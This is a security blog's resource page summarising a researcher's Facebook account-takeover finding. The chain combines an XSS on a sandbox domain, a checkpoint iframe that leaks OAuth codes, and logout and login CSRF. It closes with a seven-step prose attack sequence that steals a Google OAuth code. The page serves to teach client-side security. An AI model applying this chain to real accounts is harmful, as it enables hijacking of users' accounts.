Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Facebook has an extra security mechanism after logging in to ensure the user is valid. This could be a captcha, MFA but is commonly referred to as a chcekpoint. This is implemented within an iframe that is a sandboxed URL.

When implementing this, the outside domain URL is shared with the sandbox URL. Since this could be within some OAuth flow, the code for OAuth could be leaked inside of this iframe. So, if we could communicate with this iframe we could potentially steal oauth codes to takeover accounts.

By chance, the author already had an XSS with the domain www.fbsbx.com. Since the domain is a sandbox, it's actual by design though. On a particular page, it's possible to upload HTML files on this domain.

To steal the URL passed to the iframe we need to have a relation to the two windows. First, we need access to the Facebook checkpoint page. Next, we need a window with the XSS on the Facebook sandbox referenced as well.

To do this, we can open the first window in a new tab from our malicious website. For the second one, we can create an iframe on this page with the sandbox within it.

The iframe for the sandbox and the window with the login code with the page have the same origin. Hence, they are able to read the some of the same information! In particular, the location.href can be stolen to get the code.

The one other complication to this is that we need to force the account into this checkpoint state. So, we can use a login CSRF and a logout CSRF to do the trick. However, if we do this to Facebook directly then we won't get anything out of it. So, the trick is to do this to a OAuth provider, like Gmail.

To perform the attack, do the following steps:

1. Logout CSRF
2. Login CSRF
3. Open up the Gmail OAuth provider with a redirect to Facebook with window.open(). This will redirect to Facebook's checkpoint page with a code in the iframe.
4. Wait a few seconds for all of the interactions to happen.
5. Access the frames information using the XSS to get the Google OAuth code.
6. Start the password recovery process on Facebook.com and connect via Gmail.
7. Use the code and state in order to login to Google.

The deep understanding of client side security of this hacker always amazes me. On top of this, just having an XSS in the pocket was awesome. I wonder if there's a good place to find all of the client side security things? If you see one, please let me know!